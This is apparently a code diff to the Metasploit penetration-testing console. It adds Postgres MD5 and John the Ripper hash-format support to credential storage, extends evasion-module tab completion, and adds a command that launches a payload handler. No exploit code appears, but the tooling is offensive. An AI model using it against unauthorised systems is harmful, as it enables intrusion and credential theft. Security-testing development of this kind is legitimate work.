@@ -88,7 +88,7 @@ module CommandDispatcher
        return if ele.count('-') > 1
        return if ele.first == '-' || ele[-1] == '-'
        return if ele.first == '.' || ele[-1] == '.'
-        return unless ele =~ (/^(\d)+$/)  # Not a number
+        return unless ele =~ (/^\d+((\.\.|-)\d+)?$/)  # Not a number or range

        if ele.include? '-'
          temp_array = (ele.split("-").inject { |s, e| s.to_i..e.to_i }).to_a
@@ -241,14 +241,12 @@ class Core
    exp_aux_pos = "#{stats.num_exploits} exploits - #{stats.num_auxiliary} auxiliary - #{stats.num_post} post",
    pay_enc_nop = "#{stats.num_payloads} payloads - #{stats.num_encoders} encoders - #{stats.num_nops} nops",
    eva         = "#{stats.num_evasion} evasion",
-    dev_note    = "** This is Metasploit 5 development branch **"
    padding     = 48

    banner << ("       =[ %-#{padding+8}s]\n" % version)
    banner << ("+ -- --=[ %-#{padding}s]\n" % exp_aux_pos)
    banner << ("+ -- --=[ %-#{padding}s]\n" % pay_enc_nop)
    banner << ("+ -- --=[ %-#{padding}s]\n" % eva)
-    banner << ("+ -- --=[ %-#{padding}s]\n" % dev_note)

    if ::Msf::Framework::EICARCorrupted
      avdwarn = []
@@ -1644,8 +1642,12 @@ class Core
      res << 'PAYLOAD'
      res << 'NOP'
      res << 'TARGET'
-    end
-    if (mod.exploit? or mod.payload?)
+      res << 'ENCODER'
+    elsif (mod.evasion?)
+      res << 'PAYLOAD'
+      res << 'TARGET'
+      res << 'ENCODER'
+    elsif (mod.payload?)
      res << 'ENCODER'
    end

@@ -1653,7 +1655,7 @@ class Core
      res << "ACTION"
    end

-    if (mod.exploit? and mod.datastore['PAYLOAD'])
+    if ((mod.exploit? or mod.evasion?) and mod.datastore['PAYLOAD'])
      p = framework.payloads.create(mod.datastore['PAYLOAD'])
      if (p)
        p.options.sorted.each { |e|
@@ -2163,6 +2165,9 @@ class Core
      return option_values_targets()  if opt.upcase == 'TARGET'
      return option_values_nops()     if opt.upcase == 'NOPS'
      return option_values_encoders() if opt.upcase == 'STAGEENCODER'
+    elsif (mod.evasion?)
+      return option_values_payloads() if opt.upcase == 'PAYLOAD'
+      return option_values_targets()  if opt.upcase == 'TARGET'
    end

    # Well-known option names specific to modules with actions
@@ -2170,8 +2175,8 @@ class Core
      return option_values_actions() if opt.upcase == 'ACTION'
    end

-    # The ENCODER option works for payloads and exploits
-    if ((mod.exploit? or mod.payload?) and opt.upcase == 'ENCODER')
+    # The ENCODER option works for evasions, payloads and exploits
+    if ((mod.evasion? or mod.exploit? or mod.payload?) and opt.upcase == 'ENCODER')
      return option_values_encoders()
    end

@@ -2186,7 +2191,7 @@ class Core
    end

    # How about the selected payload?
-    if (mod.exploit? and mod.datastore['PAYLOAD'])
+    if ((mod.evasion? or mod.exploit?) and mod.datastore['PAYLOAD'])
      if p = framework.payloads.create(mod.datastore['PAYLOAD'])
        p.options.each_key do |key|
          res.concat(option_values_dispatch(p.options[key], str, words)) if key.downcase == opt.downcase
@@ -132,8 +132,10 @@ class Creds
      user:         'Public, usually a username',
      password:     'Private, private_type Password.',
      ntlm:         'Private, private_type NTLM Hash.',
+      postgres:     'Private, private_type postgres MD5',
      'ssh-key' =>  'Private, private_type SSH key, must be a file path.',
      hash:         'Private, private_type Nonreplayable hash',
+      jtr:          'Private, private_type John the Ripper hash type.',
      realm:        'Realm, ',
      'realm-type'=>"Realm, realm_type (#{Metasploit::Model::Realm::Key::SHORT_NAMES.keys.join(' ')}), defaults to domain."
    }.each_pair do |keyword, description|
@@ -151,10 +153,12 @@ class Creds
    print_line "   creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A"
    print_line "   # Add a NTLMHash"
    print_line "   creds add ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A"
+    print_line "   # Add a Postgres MD5"
+    print_line "   creds add user:postgres postgres:md5be86a79bf2043622d58d5453c47d4860"
    print_line "   # Add a user with an SSH key"
    print_line "   creds add user:sshadmin ssh-key:/path/to/id_rsa"
    print_line "   # Add a user and a NonReplayableHash"
-    print_line "   creds add user:other hash:d19c32489b870735b5f587d76b934283"
+    print_line "   creds add user:other hash:d19c32489b870735b5f587d76b934283 jtr:md5"
    print_line "   # Add a NonReplayableHash"
    print_line "   creds add hash:d19c32489b870735b5f587d76b934283"

@@ -174,6 +178,27 @@ class Creds
    print_line "  -R,--rhosts           Set RHOSTS from the results of the search"
    print_line "  -S,--search-term      Search across all fields using regex"

+    print_line
+    print_line "Examples, John the Ripper hash types:"
+    print_line "  Operating Systems (starts with)"
+    print_line "    Blowfish ($2a$)   : bf"
+    print_line "    BSDi     (_)      : bsdi"
+    print_line "    DES               : des,crypt"
+    print_line "    MD5      ($1$)    : md5"
+    print_line "    SHA256   ($5$)    : sha256,crypt"
+    print_line "    SHA512   ($6$)    : sha512,crypt"
+    print_line "  Databases"
+    print_line "    MSSQL             : mssql"
+    print_line "    MSSQL 2005        : mssql05"
+    print_line "    MSSQL 2012/2014   : mssql12"
+    print_line "    MySQL < 4.1       : mysql"
+    print_line "    MySQL >= 4.1      : mysql-sha1"
+    print_line "    Oracle            : des,oracle"
+    print_line "    Oracle 11         : raw-sha1,oracle11"
+    print_line "    Oracle 11 (H type): dynamic_1506"
+    print_line "    Oracle 12c        : oracle12c"
+    print_line "    Postgres          : postgres,raw-md5"
+
    print_line
    print_line "Examples, listing:"
    print_line "  creds               # Default, returns all credentials"
@@ -182,6 +207,7 @@ class Creds
    print_line "  creds -p 22-25,445  # nmap port specification"
    print_line "  creds -s ssh,smb    # All creds associated with a login on SSH or SMB services"
    print_line "  creds -t ntlm       # All NTLM creds"
+    print_line "  creds -j md5        # All John the Ripper hash type MD5 creds"
    print_line

    print_line "Example, deleting:"
@@ -203,14 +229,14 @@ class Creds
    end

    begin
-      params.assert_valid_keys('user','password','realm','realm-type','ntlm','ssh-key','hash','address','port','protocol', 'service-name')
+      params.assert_valid_keys('user','password','realm','realm-type','ntlm','ssh-key','hash','address','port','protocol', 'service-name', 'jtr', 'postgres')
    rescue ArgumentError => e
      print_error(e.message)
    end

    # Verify we only have one type of private
-    if params.slice('password','ntlm','ssh-key','hash').length > 1
-      private_keys = params.slice('password','ntlm','ssh-key','hash').keys
+    if params.slice('password','ntlm','ssh-key','hash', 'postgres').length > 1
+      private_keys = params.slice('password','ntlm','ssh-key','hash', 'postgres').keys
      print_error("You can only specify a single Private type. Private types given: #{private_keys.join(', ')}")
      return
    end
@@ -267,6 +293,17 @@ class Creds
    if params.key? 'hash'
      data[:private_type] = :nonreplayable_hash
      data[:private_data] = params['hash']
+      data[:jtr_format] = params['jtr'] if params.key? 'jtr'
+    end
+
+    if params.key? 'postgres'
+      data[:private_type] = :postgres_md5
+      if params['postgres'].downcase.start_with?('md5')
+        data[:private_data] = params['postgres']
+        data[:jtr_format] = 'postgres'
+      else
+        print_error("Postgres MD5 hashes should start wtih 'md5'")
+      end
    end

    begin
@@ -295,7 +332,7 @@ class Creds
    set_rhosts = false

    #cred_table_columns = [ 'host', 'port', 'user', 'pass', 'type', 'proof', 'active?' ]
-    cred_table_columns = [ 'host', 'origin' , 'service', 'public', 'private', 'realm', 'private_type' ]
+    cred_table_columns = [ 'host', 'origin' , 'service', 'public', 'private', 'realm', 'private_type', 'JtR Format' ]
    user = nil
    delete_count = 0
    search_term = nil
@@ -431,15 +468,17 @@ class Creds
        private_val = core.private ? core.private.to_s : ""
        realm_val = core.realm ? core.realm.value : ""
        human_val = core.private ? core.private.class.model_name.human : ""
+        jtr_val = core.private.jtr_format ? core.private.jtr_format : ""

        tbl << [
          "", # host
          origin, # origin
          "", # service
-          public_val,
+          public_val, 
          private_val,
          realm_val,
-          human_val
+          human_val, #private type
+          jtr_val
        ]
      else
        core.logins.each do |login|
@@ -466,12 +505,14 @@ class Creds
          private_val = core.private ? core.private.to_s : ""
          realm_val = core.realm ? core.realm.value : ""
          human_val = core.private ? core.private.class.model_name.human : ""
+          jtr_val = core.private.jtr_format ? core.private.jtr_format : ""

          row += [
            public_val,
            private_val,
            realm_val,
-            human_val
+            human_val,
+            jtr_val
          ]
          tbl << row
        end
@@ -8,11 +8,12 @@ class Evasion

  def commands
    super.update({
-      'run'      => 'Launches the evasion module',
-      'rerun'    => 'Reloads and launches the evasion module',
-      'exploit'  => 'This is an alias for the run command',
-      'rexploit' => 'This is an alias for the rerun command',
-      'reload'   => 'Reloads the auxiliary module'
+      'run'        => 'Launches the evasion module',
+      'rerun'      => 'Reloads and launches the evasion module',
+      'exploit'    => 'This is an alias for the run command',
+      'rexploit'   => 'This is an alias for the rerun command',
+      'reload'     => 'Reloads the auxiliary module',
+      'to_handler' => 'Creates a handler with the specified payload'
    }).merge(mod ? mod.evasion_commands : {})
  end

@@ -65,6 +66,24 @@ class Evasion
    tab_complete_generic(fmt, str, words)
  end

+  def cmd_to_handler(*_args)
+    handler = framework.modules.create('exploit/multi/handler')
+
+    handler_opts = {
+      'Payload'        => mod.datastore['PAYLOAD'],
+      'LocalInput'     => driver.input,
+      'LocalOutput'    => driver.output,
+      'ExitOnSession'  => false,
+      'RunAsJob'       => true
+    }
+
+    handler.share_datastore(mod.datastore)
+    handler.exploit_simple(handler_opts)
+    job_id = handler.job_id
+
+    print_status "Payload Handler Started as Job #{job_id}"
+  end
+
  private

  def self.choose_payload(mod)
@@ -116,4 +135,4 @@ end
 end
 end
 end
-end
+end
--- a/Show More
+++ b/Show More